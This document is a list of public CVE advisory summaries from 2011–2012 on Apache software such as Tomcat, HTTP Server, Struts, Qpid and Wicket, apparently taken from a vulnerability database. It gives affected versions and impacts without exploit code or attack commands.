6126| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
6127| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
6128| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
6129| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
6130| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
6131| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
6132| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
6133| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
6134| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
6135| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
6136| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
6137| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
6138| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
6139| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
6140| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
6141| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
6142| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
6143| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
6144| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6145| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
